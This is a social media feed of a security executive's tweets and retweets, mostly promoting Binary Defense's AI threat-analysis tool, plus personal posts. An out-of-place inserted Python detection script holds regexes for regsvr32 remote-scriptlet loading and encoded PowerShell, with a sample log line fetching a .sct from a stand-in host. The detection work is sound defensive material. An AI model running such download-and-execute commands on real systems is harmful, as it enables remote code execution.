Jason Vest


@FasterHorses_ Yea I’m right outside of Buffalo I’m moving to Texas.
Jason Vest retweeted

“Iran is just looking for those little, tiny flaws within our infrastructure that they can use to create as much havoc as possible.”
@TrustedSec & @Binary_Defense founder David Kennedy urges American companies to remain on high alert following an Iranian-linked cyberattack.
@DanaPerino
Jason Vest retweeted

Some pentesters may say that #PowerShell is dead, but is it? In the third post of this series, @Carlos_Perez explains how PowerShell's native logging captures deobfuscated code before it executes, giving defenders the visibility they need. Read it now! hubs.la/Q046ddjL0
Jason Vest retweeted

Here's a demo on a project I've been developing and working on for the past 9 months.
Called NightBeacon. Using it now in production, getting released fully this week.
Our own internally trained models on our own infrastructure (no third party). Trained on our analysts' knowledge and behavior (TP/FPs retrain the model to be smarter with context).
Handles emails (including tonality), attachments, various malicious filetypes (DLL/exe/svg/lnk/etc). Can send it full evtx exports, packet dumps, zip files, whatever.
Universal log handler can parse any log from any source, EDR, SIEM, etc.
Deep-Scan / sandbox detonation + shellcode emulation with IOC extraction automatically.
Automatic playbook generation, full AI-based recommendations custom to the attack.
Synthetic training data layer - meaning when it trains on a specific attack at a customer, it generates training data based on the customer's data but never has any of the actual data or information about the customer in it. No customer information.
For areas it's weak at, it bubbles up and automatically kicks off research to become smarter on a specific topic.
Supports GenAI based rulesets (to improve confidence), over 900+ YARA rules, full MITRE ATT&CK integration.
Integrated into our SOAR - enriches data, creates playbooks for analysts, MTTR reduces substantially, false positives reduced, true positive escalations.
Not using our MDR service? Can integrate into your EDR or SIEM for automatic enrichment and escalation of attacks.
Built to help respond faster. More accurately. Be intelligent based on our analysts intelligence. Stop attackers much much faster.
Coming soon...
#BinaryDefense
Jason Vest retweeted

Here is a live demo of our AI solution I've been building non-stop over the past 8 months @Binary_Defense.
How it works: Our own model trained on our analysts behavior. Our analysts submit tickets as false positives/true positives with context which enriches our LLM to be smarter over time.
Key Highlights: If it's a binary - will automatically spin up an agent for reverse engineering it and using EMBER ML to understand behavior and intent of the binary.
File formats: Supports a vast array of pretty much any filetype, including email attachments like SVG, LNK, etc. Can handle DLLs, ELF, EXEs, PDF, XLS, DOC, etc.
Interrogates the full chain of all events irrespective of log sources. Can handle any format of logs and integrates into APIs of customers for additional agentic data looping for confidence ranking when needed.
This is an example of the back-end UI, this is transparent to analysts and enriches the alarms automatically in our SOAR.
In these examples there are three different types:
1. Regsvr32 + sct downloader + scrobj.dll code execution - checks reputation of domain, pulls in threat intel, looks at entire picture of the chain - downloads the file itself and inspects for code analysis. Determines if malicious as well as historically looking back if seen in customer before in past.
2. Powershell Obfuscation - uses a universal decoder to un-obfuscate powershell and look at the raw code. Can handle pretty much any obfuscation thrown at it (thanks @HackingLZ).
3. Email with malicious SVG - checks tonality of email, are they creating urgency to take action (increases confidence) - disassembles SVG to understand malicious content - checks URL to determine if harvesting credentials, payload delivery, etc.
Creates an entire kill chain analysis with full response and dissecting of the attack to the analyst in seconds. Has greatly sped up our ability to respond to incidents and allowing analysts to focus on the most important alarms through prioritization.
One cool thing I've worked heavily on is a synthetic data normalizer which, when an analyst says "Yes this is bad with context" or "No this is a false positive," has our local model generate training data to be smarter in the future without using the actual customer data to train it. The customer's actual data is immediately destroyed once training data off of the original alarm is generated and contains no customer-centric data at all.
We also have three model tiers.
Opt-In (collective model, again no customer data but every organization contributes to training).
Opt-Out - does not train on any customer data for customers who opt-out.
Private LLM - LLM created specifically for individual customer and trains only off of their data. Uses shared model collective for better confidence rankings.
It will generate automated playbooks to run based on confidence rankings to take action on behalf of the customer. Still human driven on execution - has to approve playbook actions.
This thing is cooking and so cool to see this work live and shut down attackers much faster!
If confidence ranking is low - will automatically attempt to enrich data through customer environments for better confidence rankings. Additionally, if the model isn't trained well on a certain technology, I have created something we call "Nexus" that will research new protocols, devices, SDKs, etc., and generate training data automatically. Works well for zero-days, for example: point to a tweet or a research paper, and it automatically generates training data to recognize this attack much faster.
Have over 8000+ YARA rule integrations that help with confidence boosting as well and are automatically incorporated into the analysis.
Creating some amazing stuff at Binary Defense that isn't marketing fluff - actionable things that are making a huge difference in this industry.
#BinaryDefense
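As an added example (not NightBeacon's or Binary Defense's code), here is a small Python triage over constructed process-creation log lines covering two of the three alert types in the list above: regsvr32 fetching a remote .sct through scrobj.dll, and an encoded PowerShell command whose base64-of-UTF-16LE payload is decoded back to the raw script the way item 2 describes. The log field names, URL and script are constructed for the example.

```python
import base64
import re

# Rule 1: regsvr32 told to fetch a remote scriptlet (/i:<url>) and load it via scrobj.dll.
REGSVR32_SCT_RE = re.compile(r"regsvr32(?:\.exe)?\b.*?/i:(?P<url>\S+).*?scrobj\.dll", re.I)
# Rule 2: PowerShell launched with an encoded command (-e, -ec, -enc, -EncodedCommand).
ENCODED_PS_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+(?P<b64>[A-Za-z0-9+/=]+)", re.I)
COMMANDLINE_RE = re.compile(r'CommandLine="([^"]*)"')


def encode_ps(script):
    """Encode a script the way PowerShell expects for -EncodedCommand (base64 of UTF-16LE).
    Used here only to build the constructed sample line."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(b64):
    """Reverse the encoding; restore any '=' padding the sender dropped."""
    padded = b64 + "=" * (-len(b64) % 4)
    return base64.b64decode(padded).decode("utf-16le")


def triage(line):
    """Return a finding dict for one log line, or None if neither rule matches."""
    cmd_match = COMMANDLINE_RE.search(line)
    if not cmd_match:
        return None
    cmd = cmd_match.group(1)
    m = REGSVR32_SCT_RE.search(cmd)
    if m:
        return {"rule": "regsvr32_remote_sct", "url": m.group("url"), "command": cmd}
    m = ENCODED_PS_RE.search(cmd)
    if m:
        decoded = decode_encoded_command(m.group("b64"))
        return {"rule": "powershell_encoded_command", "decoded": decoded, "command": cmd}
    return None


def run(lines):
    """Triage every line and keep only the findings."""
    return [hit for hit in map(triage, lines) if hit]


# Constructed sample telemetry (not real data); the host uses the reserved .invalid TLD.
SAMPLE_SCRIPT = "Get-ChildItem C:\\Users -Recurse | Out-File C:\\Temp\\listing.txt"
SAMPLE_LOGS = [
    'Image=regsvr32.exe CommandLine="regsvr32.exe /s /n /u /i:http://example.invalid/a.sct scrobj.dll"',
    'Image=powershell.exe CommandLine="powershell.exe -NoP -W Hidden -EncodedCommand ' + encode_ps(SAMPLE_SCRIPT) + '"',
    'Image=notepad.exe CommandLine="notepad.exe C:\\Users\\alice\\notes.txt"',
]

if __name__ == "__main__":
    for hit in run(SAMPLE_LOGS):
        print(hit)
```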
Jason Vest retweeted

Good read and research on malicious SVG file analysis and how it's weaponized by Adam Paulina @Binary_Defense
binarydefense.com/resources/blog…
#BinaryDefense
Jason Vest retweeted

Great blog post from Jordan @Binary_Defense: Slivering Through The Cracks
binarydefense.com/resources/blog…
#BinaryDefense
Jason Vest retweeted

Microsoft seems to be integrating #Copilot into everything. And we mean EVERYTHING. Find out what we have to say about it and how it relates to data security on the latest episode of the #SecurityNoise podcast! @hoodoer hubs.la/Q0410rHb0
Jason Vest retweeted

Most ransomware attacks are not missed because the data is gone. They are missed because the signal gets buried.
The clip below shows why a smarter, unified SOC is becoming the new standard. The visibility is there. The context is not.
Watch the clip, then check out the full webinar to see how teams are transforming detection and response with the right AI powered approach.
binarydefense.com/webinars/rearc…

Jason Vest retweeted

Join us for our next #Discord Livestream on December 4 at 11:00AM ET! @oddvarmoe will discuss his research outlined in his blog: Hack-cessibility: When DLL Hijacks Meet Windows Helpers. Don't miss your chance to ask questions and see live demos! trustedsec.com/about-us/event…

Jason Vest retweeted

Olmsted Falls cybersecurity high school program at #TrustedSec HQ this morning, and here teaching them what it looks like to have a career in this industry. Love this!


@AmandaMAtwell @AmericanAir The “departure time” you are tracking is actually “push back from the gate time”
Actual take-off time is accounted for and not published to you.

I don’t think I have a single @AmericanAir flight that has taken off on time this year. Even if we board on time. Sit on the tarmac for 30 minutes without explanation? Why not! 😒

I've had this discussion with my son many times who wants to become a Marine also. He's 15, and I've actually tried talking him out of it and to go air force but he won't listen 😂
Here's what I try to explain to him - nothing in the Marines is impossible, it's all doable and it's something that almost anyone can do. The biggest challenge is it's a substantial life change and you have to get used to it quickly.
Personally, it's no different than going off to college and living on your own, but it is still vastly different and something that matures you super fast.
You go from seeing your family everyday, to maybe once a year or if you visit (as my parents did), a few times.
Boot camp isn't really hard, it's just the sheer shock of the whole experience, and them breaking you down so you can be an awesome Marine. The crucible, the PFTs, the gas chamber, all super easy stuff tbh, but one thing Marines really teach you is how to accomplish things you don't think you can do. Life lesson that still follows me today.
I would suggest finding a career in the Marines that translates to the outside world well. That's the biggest challenge I see from those that decide not to stay in as a career Marine/retire. For me, I got lucky getting into intel and cybersecurity which was a seamless transition to private sector.
Some of the fondest memories I have in life are from the Marines - and something that I would never change. Nothing beats walking back from the crucible and them handing you an Eagle, Globe, and Anchor and calling you a Marine for the first time.
Jason Vest retweeted

Huntress is seeing multiple threat actors hit networks via SonicWall devices, even when MFA is enabled.
Pivot straight to DC. Suspected ransomware (Akira).
If you’re running SonicWall VPN, read this now:
Dray Agha @Purp1eW0lf
🚨 SonicWall Exploitation (Zero Day?) 🚨 Huntress is tracking active intrusions via SonicWall devices. Threat actors are bypassing MFA, pivoting to domain controllers, deploying ransomware (likely Akira), and creating users for persistence. Pace suggests possible zero-day
Jason Vest retweeted

#AI is changing how we work, build, and make decisions. But with that opportunity comes a new kind of responsibility: understanding what these tools are doing, and how to keep them safe.
With the right visibility and controls in place, AI can be a competitive advantage, not a #security liability.
Read the full breakdown from our CTO, @Jason__V__, on @Forbes: bit.ly/4nsbawi
Jason Vest retweeted

11 years. Thousands of threats stopped. One mission: protect people.
Today we celebrate the real heroes, our team of defenders who've spent each and every day making sure YOU can sleep at night.
They don't just monitor threats. They hunt them. And we couldn't be prouder.
Here's to making the digital world safer, one threat at a time.
#11YearsStrong #Cybersecurity


